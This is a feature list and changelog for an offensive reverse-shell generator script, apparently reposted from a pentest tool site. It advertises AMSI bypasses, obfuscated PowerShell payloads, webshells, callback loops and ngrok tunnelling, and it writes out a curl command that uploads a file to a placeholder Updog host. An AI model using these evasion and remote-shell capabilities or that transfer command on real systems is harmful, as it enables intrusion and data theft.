A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formated.
- Shows [email protected], above the prompt and working-directory
- Has a partial AMSI-bypass, making some stuff a bit easier
- TCP and UDP
- Windows Powershell and Core Powershell
- Functions for uploading and downloading files. (Using Updog by sc0tfree)
- ngrok can be started/stopped from inside the script
- payloads will be genereated with the ngrok addresses
- you can start/stop Updog from inside the script
- The PowerShell revshells have upload/download function embedded
- To upload from nix using curl:
curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload
To install Shells
git clone https://github.com/4ndr34z/shells
- Added webshells (ASPX, PHP, JSP)
- Added 2 c++ revshell binaries for Windows 32 and 64 bit.
- Fixed the handling of starting/stopping Updog
- Added Updog support
- Added Netcat binaries.
- Powershell: Created upload/download functionality (upload requires Updog for receiving files)
- Added more information about running ngrok and Updog.
- PowerShell: Added a new “mini AMSI-bypass”. (It is a partial bypass) Based on Matt Graebers Reflection method
- PowerShell: Added a “upload” function in the Powershell reverseshell
- Removed AMSI. Not tested enough 🙂
- Added AMSI-bypass for the powershell payloads
- Fixed bug when setting port
- Changed default port to 443
- PowerShell: obfuscated some more
- PowerShell: Minor changes to the UDP payload
- Using only native nc on macOS, because the one on homebrew doesn’t work on incoming UDP
- PowerShell: Added UDP payloads
- PowerShell: Added more payloads
- PowerShell: Using UTF8 encoding in payload
- Added Golang
- Added OpenSSL
- Fixed bug in Python revshell
- Added awk
- Added Bash UDP
- Added Windows Python revshells
- Added a ngrok running-status
- Hiding ngrok choice if not installed
- Fixed the install options: not doing default option when pressing enter without making a choice
- Added support for ngrok.
- Added a install-script
- Added install options for checking and installing missing dependencies
- Added a couple of PHP shells
- Added shells for: Ruby, Perl, Telnet and zsh
- Added copy to clipboard using pbcopy on macOS
- Added info about listening netcat as the macOS versions doesn’t display that
- Added looping netcat shells. Calls back every 10 seconds. Great in case you loose your shell
- Added check for netcat GNU netcat 0.7.0 Homebrew when running on macOS
- Added support for macOS
Source : KitPloit – PenTest Tools!